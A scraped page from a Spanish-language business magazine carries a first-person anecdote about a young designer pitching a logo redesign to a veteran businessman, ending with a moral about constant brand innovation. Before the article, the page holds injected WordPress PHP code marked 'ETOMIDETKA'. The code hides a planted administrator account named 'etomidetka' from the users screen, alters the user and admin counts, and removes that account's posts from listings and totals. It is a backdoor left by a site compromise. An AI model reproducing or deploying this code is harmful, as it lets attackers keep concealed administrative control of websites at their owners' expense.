//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); Anécdotas de un novato | Revista Fusión Empresarial
Anécdotas de un novato

Hace un poco más de 10 años atrás, tuve la oportunidad de estar frente a un empresario muy importante, su hijo era y sigue siendo a la fecha, uno de mis mejores amigos y como buen amigo, me llevó hasta la presencia de su padre ya que tanto él como yo, estábamos convencidos que a la marca familiar le hacía falta una renovación, “refresh” le llaman algunos. Después de esperar impaciente algunos minutos, por fin nos recibió, pero cual fue mi sorpresa, que “mi amigo”, me dice, entra, yo te espero aquí afuera, fuck, en ese momento me entró el nervio pero ya estaba ahí parado frente a un señor de rostro serio, concentrado en papeles varios que se veían sobre su gran escritorio de madera fina y brillante, al verme parado justo frente a la puerta, con voz firme y ronca me dice, pasa pasa, siéntate, me dijo mi hijo que querías platicar conmigo, dime, ¿qué necesitas?, ahí estaba yo sentado frente a un hombre que no dejaba de revisar documentos y que de momento parecía que estaba más concentrado en sus papeles que en mi presencia, ahora bien, en ese entonces, contaba con al menos 27 años mas menos, Fusión Creativa (mi agencia) tenía exagerado un par de años de haber abierto las puertas y pues nada, después de poder controlar mi respiración, le dije con voz tímida y a bajo volumen, lo que pasa es que ya ve que su hijo y yo somos amigos y un día estábamos platicando y coincidimos que su marca ya lleva muchos años sin hacerle algún rediseño o mejora, ya se ve como “viejita” y pues quería ver si le interesa que le mejore su logotipo y le diseñe varias cosas.

En ese momento levanto el rostro, me miro fijamente y me dijo, para qué quieres que haga eso si yo de cualquier forma vendo y vendo mucho, algo me comentó mi hijo pero no le entendí muy bien lo que quería, justo en ese momento sentí que la garganta se me cerró, trague saliva, me empezaron a sudar las manos, prácticamente me paralicé, no supe que responder, como cuando te quedas hipnotizado, ahí estaba yo, con muy poca experiencia pero con deseos de demostrar que tenía el talento y la pasión por tener cuentas que me retaran a mejorar y crecer, fue justo en ese momento (honestamente no sé cuanto tiempo pasó) y se me ocurrió una gran idea (por lo menos para mí lo era), a lo que le respondí, justo por lo mismo es que lo vengo a ver, por que urge hacer esas mejoras por el bien de su liderazgo en su ramo, imagine usted que  Coca Cola tuviera ese mismo pensar, “soy el rey de los refrescos de cola, ¿para qué me anuncio?”, piense por un momento por qué esa y otras grandes marcas están en constante movimiento todo el tiempo, posiblemente y sin duda su negocio siempre ha sido rentable, pero piense en como están cambiando las cosas últimamente y que los que ahora son sus clientes, mañana dejarán de serlo, hay que trabajar en posicionar la marca en las nuevas generaciones con la finalidad de que la marca perdure a través del tiempo.

Se escuchó un silencio como pocos que recuerdo, la valentía y entusiasmo que había logrado por tres minutos aproximadamente los ví esfumarse y su rostro me veía fijamente, a lo que me preguntaba en silencio qué era lo que pasa por la mente de este hombre, que su formación y manera de hacer negocios nunca tuvieron contacto con algo que me apasionaba y que estaba dispuesto a morir en la raya (aún lo estoy), en creer firmemente que el diseño puede hacer un mundo más bello y que su marca lo pedía a gritos, fue entonces cuando su rostro dió una pequeña muestra de alegría y con una sonrisa incrédula me dijo: “está bien, tráeme una propuesta y ya veremos si me gusta”, al escuchar esas cortas, pero desafiantes palabras, me levanté inmediatamente y le dije: muchas gracias por confiar en mí Sr., ya verá que no le voy a fallar y que lo que le traiga le gustará, salí de esa oficina (aún recuerdo) con paso firme, seguro y motivado de que era la oportunidad de buscaba, una gran marca creía en mi (o por lo menos eso sentí), y sin tener un presupuesto autorizado ni un número mínimamente apalabrado, salí de esas instalaciones directo a la agencia y le conté la historia a la que en ese entonces era mi socia y de mis mejores amigas de la universidad (Saray) y arrancamos a investigar un poco más sobre la marca, hacer preguntas, le marqué a mi amigo y le dí la noticia, la cual le alegro y que fué parte del proceso de investigación y una vez que teníamos claro lo que la marca necesitaba, empezamos a bocetar como lo dicta la vieja escuela, una hoja en blanco y un lápiz, aunque en realidad fueron muchas y muchas hojas de posibles respuestas. Una vez terminado el proyecto, lo demás es historia, tuvimos una relación comercial por más de 6 años, donde ambos aprendimos mucho y que hoy en día sigue siendo una de las marcas líderes en su ramo.

La moraleja es: Camarón que se duerme, se lo lleva la corriente.

Nunca dejes de arriesgarte y de innovar, procura tener una cronología mínima de 6 meses sobre aspectos para seguir mejorando el posicionamiento de tu marca; cómo esperas que tu negocio genere ingresos, si no inviertes en mostrarte como una marca cercana al cliente, de manera creativa y eficiente.

Añadir Comentario